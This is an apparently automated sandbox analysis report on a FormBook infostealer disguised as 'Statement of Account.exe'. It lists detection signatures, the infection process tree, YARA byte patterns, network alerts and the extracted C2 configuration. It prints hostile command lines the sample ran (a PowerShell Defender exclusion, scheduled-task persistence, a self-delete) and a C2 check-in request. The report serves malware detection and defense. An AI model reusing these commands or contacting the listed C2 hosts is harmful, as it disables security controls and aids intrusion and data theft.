Windows Analysis Report
Statement of Account.exe

Overview

General Information

Sample name: Statement of Account.exe
Analysis ID: 1543876
MD5: d034873f3ca1528cd660316e6bbe8c14
SHA1: bfd745b38033a3e3ee21be7876d053ea20cc46ef
SHA256: 0248b7bdbf6c49ffceddae89725a94da2c3076ebbf6253fafd2c817b57dc5891
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Uses ipconfig to lookup or modify the Windows network settings
Uses netstat to query active network connections and open ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Statement of Account.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\Statement of Account.exe" MD5: D034873F3CA1528CD660316E6BBE8C14)
    • powershell.exe (PID: 1344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1260 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 3756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • NETSTAT.EXE (PID: 4608 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 2676 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • autochk.exe (PID: 2188 cmdline: "C:\Windows\SysWOW64\autochk.exe" MD5: FC398299F54290D5F35C69E865FD7CC2)
        • ipconfig.exe (PID: 7108 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • SIZfuXT.exe (PID: 4176 cmdline: C:\Users\user\AppData\Roaming\SIZfuXT.exe MD5: D034873F3CA1528CD660316E6BBE8C14)
    • schtasks.exe (PID: 7156 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 1780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • cleanup
Extracted malware configuration (FormBook):
{"C2 list": ["www.f6b-crxy.top/cu29/"], "decoy": ["qidr.shop", "usinessaviationconsulting.net", "68716329.xyz", "nd-los.net", "ealthironcladguarantee.shop", "oftware-download-69354.bond", "48372305.top", "omeownershub.top", "mall-chilli.top", "ajakgoid.online", "ire-changer-53482.bond", "rugsrx.shop", "oyang123.info", "azino-forum-pro.online", "817715.rest", "layman.vip", "eb777.club", "ovatonica.net", "urgaslotvip.website", "inn-paaaa.buzz", "reativedreams.design", "upremehomes.shop", "ames-saaab.buzz", "phonelock.xyz", "ideandseekvacations.xyz", "77179ksuhr.top", "ental-bridges-87553.bond", "7win2.bet", "ainan.company", "5mwhs.top", "hopp9.top", "65fhgejd3.xyz", "olandopaintingllc.online", "n-wee.buzz", "reshcasinoinfo2.top", "5734.party", "qtbyj.live", "gil.lat", "siabgc4d.online", "fios.top", "sed-cars-89003.bond", "nlineschools-2507-001-sap.click", "upiloffatemotors.online", "ordf.top", "achhonglan.shop", "irex.info", "oursmile.vip", "leachlondonstore.online", "asukacro.online", "panish-classes-64045.bond", "apita.top", "srtio.xyz", "kdsclci.bond", "ochacha.sbs", "oldsteps.buzz", "yzq0n.top", "npostl.xyz", "ladder-cancer-symptoms-mine.sbs", "400725iimfyuj120.top", "3589.photo", "rasilhojenoticias.online", "ependableequipment.online", "itusbandar126.info", "ohns.app"]}
Source | Rule | Description | Author | Strings
0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      6.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        6.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          6.2.vbc.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          6.2.vbc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          6.2.vbc.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18809:$sqlite3step: 68 34 1C 7B E1
          • 0x1891c:$sqlite3step: 68 34 1C 7B E1
          • 0x18838:$sqlite3text: 68 38 2A 90 C5
          • 0x1895d:$sqlite3text: 68 38 2A 90 C5
          • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18973:$sqlite3blob: 68 53 D8 7F 8C

          System Summary

          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", ProcessId: 1344, ProcessName: powershell.exe
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", ProcessId: 1344, ProcessName: powershell.exe
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SIZfuXT.exe, ParentImage: C:\Users\user\AppData\Roaming\SIZfuXT.exe, ParentProcessId: 4176, ParentProcessName: SIZfuXT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp", ProcessId: 7156, ProcessName: schtasks.exe
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", ProcessId: 1260, ProcessName: schtasks.exe
          Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", ProcessId: 1344, ProcessName: powershell.exe

          Persistence and Installation Behavior

          Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", ProcessId: 1260, ProcessName: schtasks.exe
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-10-28T15:35:40.784783+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49980 | 85.13.166.18 | 80 | TCP


          AV Detection

          Source: Statement of Account.exe | Avira: detected
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Avira: detection malicious, Label: TR/AD.Swotter.zvmla
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.f6b-crxy.top/cu29/"], "decoy": ["qidr.shop", "usinessaviationconsulting.net", "68716329.xyz", "nd-los.net", "ealthironcladguarantee.shop", "oftware-download-69354.bond", "48372305.top", "omeownershub.top", "mall-chilli.top", "ajakgoid.online", "ire-changer-53482.bond", "rugsrx.shop", "oyang123.info", "azino-forum-pro.online", "817715.rest", "layman.vip", "eb777.club", "ovatonica.net", "urgaslotvip.website", "inn-paaaa.buzz", "reativedreams.design", "upremehomes.shop", "ames-saaab.buzz", "phonelock.xyz", "ideandseekvacations.xyz", "77179ksuhr.top", "ental-bridges-87553.bond", "7win2.bet", "ainan.company", "5mwhs.top", "hopp9.top", "65fhgejd3.xyz", "olandopaintingllc.online", "n-wee.buzz", "reshcasinoinfo2.top", "5734.party", "qtbyj.live", "gil.lat", "siabgc4d.online", "fios.top", "sed-cars-89003.bond", "nlineschools-2507-001-sap.click", "upiloffatemotors.online", "ordf.top", "achhonglan.shop", "irex.info", "oursmile.vip", "leachlondonstore.online", "asukacro.online", "panish-classes-64045.bond", "apita.top", "srtio.xyz", "kdsclci.bond", "ochacha.sbs", "oldsteps.buzz", "yzq0n.top", "npostl.xyz", "ladder-cancer-symptoms-mine.sbs", "400725iimfyuj120.top", "3589.photo", "rasilhojenoticias.online", "ependableequipment.online", "itusbandar126.info", "ohns.app"]}
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | ReversingLabs: Detection: 76%
          Source: Statement of Account.exe | ReversingLabs: Detection: 76%
          Source: Yara match | File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Joe Sandbox ML: detected
          Source: Statement of Account.exe | Joe Sandbox ML: detected
          Source: Statement of Account.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Statement of Account.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: ipconfig.pdb source: vbc.exe, 0000000C.00000002.1858338793.00000000052E7000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.1858179937.0000000005240000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861396265.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: explorer.exe, 00000007.00000002.4177672718.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4167058236.0000000003F7F000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4166685447.0000000003AF4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netstat.pdbGCTL source: vbc.exe, 00000006.00000002.1797607492.00000000057A0000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000006.00000002.1797670992.00000000057B7000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4164513188.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: vbc.exe, 0000000C.00000002.1858338793.00000000052E7000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.1858179937.0000000005240000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861396265.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.1797607492.00000000057A0000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000006.00000002.1797670992.00000000057B7000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4164513188.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1798892977.00000000035F1000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.000000000393E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1796711119.0000000003448000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.000000000318E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1857901352.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1859917399.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1798892977.00000000035F1000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.000000000393E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1796711119.0000000003448000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.000000000318E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1857901352.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1859917399.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: vbc.pdb source: explorer.exe, 00000007.00000002.4177672718.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4167058236.0000000003F7F000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4166685447.0000000003AF4000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 4x nop then pop ebx | 6_2_00407B22

          Networking

          Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49980 -> 85.13.166.18:80
          Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49980 -> 85.13.166.18:80
          Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49980 -> 85.13.166.18:80
          Source: Malware configuration extractor | URLs: www.f6b-crxy.top/cu29/
          Source: unknown | DNS traffic detected: query: www.leachlondonstore.online, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.hopp9.top, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.kdsclci.bond, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.eb777.club, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.nd-los.net, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.f6b-crxy.top, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.yzq0n.top, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.azino-forum-pro.online, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.sed-cars-89003.bond, reply code: Name error (3)
          Source: unknown | DNS traffic detected: query: www.urgaslotvip.website, reply code: Name error (3)
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
          Source: global traffic | HTTP traffic detected: GET /cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNT HTTP/1.1 Host: www.irex.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View | ASN Name: NMM-ASD-02742FriedersdorfHauptstrasse68DE NMM-ASD-02742FriedersdorfHauptstrasse68DE
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 identical entries)
          Source: C:\Windows\explorer.exe | Code function: 7_2_0E7F0F82 getaddrinfo,setsockopt,recv, | 7_2_0E7F0F82
          Source: global traffic | HTTP traffic detected: GET /cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNT HTTP/1.1 Host: www.irex.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | DNS traffic detected: DNS query: www.yzq0n.top
          Source: global traffic | DNS traffic detected: DNS query: www.eb777.club
          Source: global traffic | DNS traffic detected: DNS query: www.irex.info
          Source: global traffic | DNS traffic detected: DNS query: www.urgaslotvip.website
          Source: global traffic | DNS traffic detected: DNS query: www.nd-los.net
          Source: global traffic | DNS traffic detected: DNS query: www.azino-forum-pro.online
          Source: global traffic | DNS traffic detected: DNS query: www.sed-cars-89003.bond
          Source: global traffic | DNS traffic detected: DNS query: www.kdsclci.bond
          Source: global traffic | DNS traffic detected: DNS query: www.leachlondonstore.online
          Source: global traffic | DNS traffic detected: DNS query: www.f6b-crxy.top
          Source: global traffic | DNS traffic detected: DNS query: www.hopp9.top
          Source: explorer.exe, 00000007.00000000.1743570907.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3493890657.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4171222123.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3107810186.0000000009836000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
